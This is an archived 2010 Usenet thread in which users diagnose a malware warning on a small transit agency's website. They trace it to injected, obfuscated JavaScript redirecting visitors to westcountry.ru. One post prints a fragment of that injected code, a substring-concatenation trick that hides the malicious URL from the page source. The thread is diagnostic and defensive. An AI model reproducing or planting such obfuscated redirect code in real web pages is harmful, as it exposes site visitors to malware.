Infected Web Site?

24 views
Skip to first unread message

Glen Labah

unread,
May 20, 2010, 2:46:45 AM5/20/10
to

I am planning a trip to the west Puget Sound region, and was exploring
some of the public transit options there. When trying to access Kitsap
Transit's web site at http://www.kitsaptransit.org/
The web page appears, then disappears, and then I get the following
message:

Warning: Visiting this site may harm your computer

The website you are visiting appears to contain malware. Malware is
malicious software that may harm your computer or otherwise operate
without your consent. Your computer can be infected just by browsing to
a site with malware, without any further action on your part.

For detailed information about problems found on this site, or a portion
of this site, visit the Google Safe Browsing diagnostic page for
westcountry.ru

I am using Safari 4.0.5.

Unfortunately, Safari does not tell me what that Westcountry.ru URL is
all about. Certain other web browsers, when you position the pointer
over the URL, will tell you what the URL is actually going to direct you
to. Safari does not tell me that, so the actual location of the error
message URL is hidden. If I click on that it sounds like it might get
me to the actual malware site (westcountry.ru is obviously a rogue web
site of some sort) but it may also be a link to Google's Safe Browsing
Diagnostic Page for westcountry.ru.

Kitsap Transit is a fairly small transit agency, and their web site is
really only simple HTML and a few GIF images. Therefore, I don't see
how anything they have on their web site could be malware, unless
someone has invaded their web site and altered their HTML.

At the same time, it seems possible that something else may have been
installed on this computer by visiting some other web site that for some
bizarre reason is triggered by attempting to look at that particular
transit agency's web site, and is trying to maliciously redirect me to
westcountry.ru and is hoping that I would click on the link provided in
the "error message".

Any thougths as to what this actually is?

Is the origin on my computer or on the transit agency's web site?

Thanks for any thoughts,

--
Please note this e-mail address is a pit of spam due to e-mail address
harvesters on Usenet. Response time to e-mail sent here is slow.

Király

unread,
May 20, 2010, 2:57:59 AM5/20/10
to
In comp.sys.mac.system Glen Labah <gl4...@yahoo.com> wrote:
> Warning: Visiting this site may harm your computer

www.kitsaptransit.org works for me. What DNS server are you using?

--
K.

Lang may your lum reek.

Message has been deleted
Message has been deleted

Glen Labah

unread,
May 20, 2010, 3:34:56 AM5/20/10
to
In article <X35Jn.4272$Z6.1798@edtnps82>, m...@home.spamsucks.ca (Kir�ly)
wrote:

> In comp.sys.mac.system Glen Labah <gl4...@yahoo.com> wrote:
> > Warning: Visiting this site may harm your computer
>
> www.kitsaptransit.org works for me. What DNS server are you using?

206.26.36.34
198.107.0.14

I found a reference that says this happens from time to time with
Safari, and to reset Safari and clean out the cache, and see what
happens. So, next up, that is what I will try.

Glen Labah

unread,
May 20, 2010, 3:44:24 AM5/20/10
to
In article <1jis7jf.1q3x0u3jb6cmlN%sn...@spambin.fsnet.co.uk>,
sn...@spambin.fsnet.co.uk (Sn!pe) wrote:

> Sn!pe <sn...@spambin.fsnet.co.uk> wrote:


>
> > Kir�ly <m...@home.spamsucks.ca> wrote:
> >
> > > In comp.sys.mac.system Glen Labah <gl4...@yahoo.com> wrote:
> > > > Warning: Visiting this site may harm your computer
> > >
> > > www.kitsaptransit.org works for me
> >

> > Also for me, with no warnings from the Firefox Web Of Trust (WOT)
> > extension.
>
> *** CORRECTION ***
>
> I forgot to defeat Noscript in FF; it seems there is a script referring
> to <http://westcountry.ru/:8080> which does indeed trigger full
> red alerts in WOT.


I attempted to clear the Cache and delete the history, and it still
produced the alert message, and so this explains what is going on.

Thanks very much.

Unfortunately, for some reason my Safari doesn't allow me to select the
"view source" option, which would really help in determining what is
going on.

Glad it isn't my computer anyway.

Message has been deleted
Message has been deleted
Message has been deleted
Message has been deleted

AES

unread,
May 20, 2010, 10:05:34 AM5/20/10
to
In article <gl4317-E9E5F9....@mail.eternal-september.org>,
Glen Labah <gl4...@yahoo.com> wrote:

>
> I am planning a trip to the west Puget Sound region, and was exploring
> some of the public transit options there. When trying to access Kitsap
> Transit's web site at http://www.kitsaptransit.org/
> The web page appears, then disappears, and then I get the following
> message:
>
> Warning: Visiting this site may harm your computer
>

I have seen exactly this same message half a dozen times recently when
clicking on links on various misc web sites -- don't recall what sites
exactly, as I do a lot of web searching, and no idea who's generating
the warning, but I just didn't push further on them. (Using latest
Safari on MacBook OS 10.4.11.)

Gerry

unread,
May 20, 2010, 11:14:21 AM5/20/10
to
In article
<siegman-11173D...@bmedcfsc-srv02.tufts.ad.tufts.edu>,
AES <sie...@stanford.edu> wrote:

This is a feature that Google has to warn users that there are web sites
which have been infected by third parties, and you should be warned that
you might be infected by visiting this site.

It is useful to email the web site owner letting them know that their
site has been infected, many are unaware that they have been attacked in
this way.

AES

unread,
May 20, 2010, 11:41:52 AM5/20/10
to
In article <everyday-D3915E...@mx02.eternal-september.org>,
Gerry <ever...@sunrise.net> wrote:

> > >
> > > Warning: Visiting this site may harm your computer
> > >

>

> This is a feature that Google has to warn users that there are web sites
> which have been infected by third parties, and you should be warned that
> you might be infected by visiting this site.
>
> It is useful to email the web site owner letting them know that their
> site has been infected, many are unaware that they have been attacked in
> this way.

Thanks. It indeed arises when I'm searching for some type of
information using Google.

[How does Google manage to do _all_ the incredible number
of things it does?!?!?]

Richard Maine

unread,
May 20, 2010, 12:24:45 PM5/20/10
to
Gerry <ever...@sunrise.net> wrote:

> > In article <gl4317-E9E5F9....@mail.eternal-september.org>,
> > Glen Labah <gl4...@yahoo.com> wrote:
> > >
> > > When trying to access Kitsap
> > > Transit's web site at http://www.kitsaptransit.org/
> > > The web page appears, then disappears, and then I get the following
> > > message:
> > >
> > > Warning: Visiting this site may harm your computer

> This is a feature that Google has to warn users...

Yes, Google has a feature to warn about some known or highly suspect
malware sites, but that only applies when you click on a link in a
Google search. It also hapens *BEFORE* you go to the site, rather than
after the site's web page appears as described above, which would be a
bit late to be useful. Google's world domination has not yet gotten to
the stage where they can directly intercede in 3rd-party web pages.

I will also absolutely guarantee you that Google does not have a message
telling you to go to some Google page at westcountry.ru. :-( :-( :-(

This message was clearly an attempt to make people think it was from
Google. Pretty lame attempt, but then plenty of people get caught by
equaly lame things.

--
Richard Maine | Good judgment comes from experience;
email: last name at domain . net | experience comes from bad judgment.
domain: summertriangle | -- Mark Twain

BreadW...@fractious.net

unread,
May 20, 2010, 12:54:19 PM5/20/10
to
Michelle Steiner <mich...@michelle.org> writes:
> In article <1jis97l.1pn2b0bxb6rrdN%sn...@spambin.fsnet.co.uk>,
> sn...@spambin.fsnet.co.uk (Sn!pe) wrote:
>
> > I did grab the source to look at it in TextWrangler and couldn't find an
> > explicit reference to westcountry.ru in it.
>
> Same here.

It's not explicit in the source text. It gets pulled in by a script.

If you look at the source text, there's a one-line script of
obfuscated javascript which generates the westcountry.ru URL. The
whole purpose of doing it that way is to make sure that you can't see
it when you look at the source code.

It's not worth de-obfuscating it, but I did paste the one-liner into
<http://jsbeautifier.org> to make it a little easier to look at. You
can see some of the bits of the bad URL broken up in the line towards
the top middle of the script which constructs the long string Y:

var Y = String("/go" + u("oglBawJ", 0, 3) + u("e-c6TKF", 0, 3) +
u("o-iNxa", 0, 3) + u("n/gJwH", 0, 3) + u("oogkynQ", 0, 3) +
u("RKole.oKR", 3, 3) + u("2tJHcomH2Jt", 4, 3) + "/li" +
u("l1XDfehl1DX", 4, 3) + "ack" + u("fm50er.fm50", 4, 3) + u("comr9uv",
0, 3) + ".ph" + u("MaTpTMa", 3, 1));

The function u() simply returns a substring of its first argument.
So u("oglBawJ", 0, 3) returns "ogl". The rest is there just to
confuse and annoy you. So do the u() calls in there and you get the
entire URL nice and easy. "/go" + "ogl" + "e-c" + "o-i", etc.

How that malware line got added to what looks like an otherwise
respectable page, I have no idea. It should be reported to the site
owner and the host.

--
Plain Bread alone for e-mail, thanks. The rest gets trashed.

dorayme

unread,
May 20, 2010, 12:55:11 PM5/20/10
to
In article
<michelle-1BF85A...@62-183-169-81.bb.dnainternet.fi>,
Michelle Steiner <mich...@michelle.org> wrote:

> In article <X35Jn.4272$Z6.1798@edtnps82>, m...@home.spamsucks.ca (Király)
> wrote:have this checked


>
> > > Warning: Visiting this site may harm your computer
> >
> > www.kitsaptransit.org works for me. What DNS server are you using?
>

> I get the same warning the OP gets; I'm using Safari 4.0.5, and have the
> fraudulent sites warning checkbox checked.

You can have this checked without the warning coming up (which
needs js enabled), by going to Develop menu, turning on things
and then turning them off. Next time you quit and restart Safari,
no warning.

--
dorayme

Message has been deleted

Glen Labah

unread,
May 21, 2010, 1:20:01 AM5/21/10
to
In article
<michelle-AD1B92...@62-183-169-81.bb.dnainternet.fi>,
Michelle Steiner <mich...@michelle.org> wrote:

> In article <gl4317-E9E5F9....@mail.eternal-september.org>,
> Glen Labah <gl4...@yahoo.com> wrote:
>

> > Unfortunately, Safari does not tell me what that Westcountry.ru URL is
> > all about. Certain other web browsers, when you position the pointer
> > over the URL, will tell you what the URL is actually going to direct you
> > to. Safari does not tell me that,
>

> Yes it does; in the status bar at the bottom of the window.


I've not been able to con Safari into giving me a status bar at the
bottom of a window, but I'm fairly new at Safari.

Glen Labah

unread,
May 21, 2010, 1:29:34 AM5/21/10
to
In article <yobocga...@panix3.panix.com>,
BreadW...@fractious.net wrote:

> How that malware line got added to what looks like an otherwise
> respectable page, I have no idea. It should be reported to the site
> owner and the host.


I've done that already, and this morning received a response that they
have their web site people working on it. Kitsap Transit is a pretty
low budget operation. One of the ferry services they operate (and in
fact one of the services they operate that I have ridden) is with a boat
that was built in 1917 simply because there isn't the money to replace
it with something a bit more modern.

So, they probably don't have the money for the best of the Seattle
area's web site security people.

BreadW...@fractious.net

unread,
May 21, 2010, 1:34:22 AM5/21/10
to
Glen Labah <gl4...@yahoo.com> writes:
> In article <yobocga...@panix3.panix.com>,
> BreadW...@fractious.net wrote:
>
> > How that malware line got added to what looks like an otherwise
> > respectable page, I have no idea. It should be reported to the site
> > owner and the host.

> I've done that already, and this morning received a response that they
> have their web site people working on it. Kitsap Transit is a pretty

I hope you'll let us know what develops. It really is odd - either
someone at the hosting company put it there, or somewhere there's lax
security which allowed the files at their webhost to be modified.
Should be interesting to find out the story.

BreadW...@fractious.net

unread,
May 21, 2010, 1:37:40 AM5/21/10
to
Glen Labah <gl4...@yahoo.com> writes:

> Michelle Steiner <mich...@michelle.org> wrote:
> > Glen Labah <gl4...@yahoo.com> wrote:
> >
> > > Unfortunately, Safari does not tell me what that Westcountry.ru
> > > URL is all about. Certain other web browsers, when you position
> > > the pointer over the URL, will tell you what the URL is actually
> > > going to direct you to. Safari does not tell me that,

> > Yes it does; in the status bar at the bottom of the window.

> I've not been able to con Safari into giving me a status bar at the
> bottom of a window, but I'm fairly new at Safari.

View->Show Status Bar
or cmd-/

That said, not all sites will give you trustworthy information on the
status bar. It's trivial to override it in Javascript.

Firefox lets you restrict some of what Javascript can do - I don't
allow Javascript to modify the content of the status bar (or hide it
or a couple of other things). AFAIK, Safari doesn't allow you to
selectively disable JS functions.

Wes Groleau

unread,
May 21, 2010, 1:28:11 PM5/21/10
to
On 05-21-2010 01:34, BreadW...@fractious.net wrote:
> I hope you'll let us know what develops. It really is odd - either
> someone at the hosting company put it there, or somewhere there's lax
> security which allowed the files at their webhost to be modified.
> Should be interesting to find out the story.

I had a similar hacking on one of my GoDaddy hosted websites.
Obfuscated Javascript was added which re-routed viewers to
a website in Russia showing off pictures of "my new baby"

It looked like that website had also been hacked for
malicious purposes, but since all the text was in English,
I think it may have been a decoy.

--
Wes Groleau

Race Doesn?t Matter
http://Ideas.Lang-Learn.us/WWW?itemid=876

Glen Labah

unread,
May 22, 2010, 3:59:41 AM5/22/10
to
In article <yobtyq1...@panix3.panix.com>,
BreadW...@fractious.net wrote:


Can't tell you the whole story, but they have removed the offending
script from the web site, as it is no longer in the source HTML.

Message has been deleted

J Burns

unread,
May 22, 2010, 8:56:55 AM5/22/10
to
I wonder how you got the warning so soon. Google says it didn't find
anything suspicious until 5/21:
http://www.google.com/safebrowsing/diagnostic?site=westcountry.ru
Message has been deleted

J Burns

unread,
May 22, 2010, 12:45:56 PM5/22/10
to
Michelle Steiner wrote:
> In article <ht8kap$258$1...@news.eternal-september.org>,

> J Burns <bur...@nowhere.com> wrote:
>
>> I wonder how you got the warning so soon. Google says it didn't find
>> anything suspicious until 5/21:
>> http://www.google.com/safebrowsing/diagnostic?site=westcountry.ru
>
> It says the *last* time it found something suspicious was 5/21:
>
>
"Part of this site was listed for suspicious activity 1 time(s) over the
past 90 days."
Reply all
Reply to author
Forward
0 new messages